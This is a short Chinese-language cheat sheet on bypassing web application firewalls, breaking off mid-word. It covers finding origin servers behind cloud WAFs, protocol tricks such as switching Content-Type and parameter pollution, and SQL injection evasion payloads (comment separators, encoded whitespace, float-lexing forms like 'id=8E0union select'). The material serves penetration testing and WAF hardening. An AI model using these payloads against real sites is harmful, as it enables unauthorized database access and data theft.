WAF绕过原理
白盒绕过
熟练的掌握MySQL函数和语法使用方式
深入了解中间件运行处理机制
了解WAF防护原理及方法
黑盒测试:(http://www.mottoin.com/86886.html)
一.架构层绕过WAF:
1. 寻找源站->针对云WAF
2. 利用同网段->绕过WAF防护区域
3. 利用边界漏洞->绕过WAF防护区域
二.资源限制角度绕过WAF:
1. POST大BOOY
三.协议层面绕过WAF的检测:
1. 协议未覆盖绕过WAf
*请求方式变换:GET->POST
*Content-Type变换:application/x-www-form-urlencoded:-> multipart/from-data
2. 参数污染
四.规则层面的绕过:
主要的绕过方式
- SQL注释符绕过
Level-1: union/**/select
Level-2: union/aaaa%01bbs/select
Level-3: union/aaaaaaaaaaaaaaaaaaaaaaaaaaaa/select - 内连注释:/!xxxx/
- 空白符号绕过:
MySQL空白符:%90,%0A,%0B,%0D,%20,%0C,%A0,/xxx/
正则的空白符:%09,%0A,%0B,%0D,%20
Example-1:union%250Cselect
Example-1:union%25A0select - 函数分隔符号:
concat%2520(
concat/**/(
concat%250c(
concat%25a0( - 浮点数词法分析:
select * from users where id=8E0union select
1,2,3,4,5,6,7,8,9,0
select * from users where id=8.0union select
1,2,3,4,5,6,7,8,9,0
select * from use